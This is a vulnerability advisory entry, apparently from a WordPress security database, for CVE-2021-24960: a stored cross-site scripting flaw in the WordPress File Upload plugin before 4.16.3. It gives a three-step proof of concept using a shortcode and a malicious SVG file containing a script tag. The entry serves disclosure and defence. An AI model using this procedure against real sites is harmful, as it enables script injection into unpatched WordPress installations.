Lucene search
Apple502jWPEX-ID:18902832-2973-498D-808E-C75D1AEDC11EHistoryFeb 14, 2022 - 12:00 a.m.
WordPress File Upload < 4.16.3 - Contributor+ Stored Cross-Site Scripting via Malicious SVG
2022-02-1400:00:00
apple502j
106
wordpress
file upload
stored cross-site scripting
contributor+. malicious svg
EPSS
0.001
Percentile
21.4%
The plugin allows users with a role as low as Contributor to configure the upload form in a way that allows uploading of SVG files, which could be then be used for Cross-Site Scripting attacks
1. As a contributor (or above) add the following shortcode to a post: [wordpress_file_upload uploadpatterns="*.svg"]
2. Preview/view the post and upload the following xss.svg file <svg xmlns:svg="http://www.w3.org/2000/svg"><svg:script>alert(/XSS/)</svg:script></svg>
3. Go to /wp-content/uploads/xss.svg to trigger the XSSRelated
patchstack
patchstack
nvd
nvd
CVE-2021-24960
2022-03-07 09:15:08
cnvd
cnvd
prion
prion
Cross site scripting
2022-03-07 09:15:00
wpvulndb
wpvulndb
cvelist
cvelist
cve
cve
CVE-2021-24960
2022-03-07 09:15:08